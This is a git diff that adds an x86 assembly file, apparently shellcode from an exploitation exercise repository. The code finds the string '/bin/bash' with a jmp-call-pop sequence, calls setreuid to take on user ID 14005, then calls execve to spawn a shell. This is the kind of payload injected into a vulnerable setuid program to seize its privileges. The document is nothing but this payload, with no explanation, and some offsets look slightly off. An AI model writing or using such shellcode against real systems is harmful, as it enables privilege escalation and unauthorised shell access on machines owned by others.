diff options
Diffstat (limited to 'exec_cmd_setuid/shell.asm')
| -rw-r--r-- | exec_cmd_setuid/shell.asm | 28 |
1 files changed, 28 insertions, 0 deletions
diff --git a/exec_cmd_setuid/shell.asm b/exec_cmd_setuid/shell.asm new file mode 100644 index 0000000..504685f --- /dev/null +++ b/exec_cmd_setuid/shell.asm @@ -0,0 +1,28 @@ +global _start +_start: +jmp short data + +exploit: + +xor edx, edx + +xor eax, eax ; set reuid +xor ebx, ebx +xor ecx, ecx +mov al, 203 +mov bx, 14005 +mov cx, 14005 +int 0x80 + +xor eax, eax +xor ebx, ebx +xor ecx, ecx +pop edx +mov [edx + 10], eax +mov al, 11 +mov ebx, cmd +int 0x80 + +data: +call exploit ; this puts the address of where we're at (where the string is!) in the stack and jmps to start +cmd: db '/bin/bash' |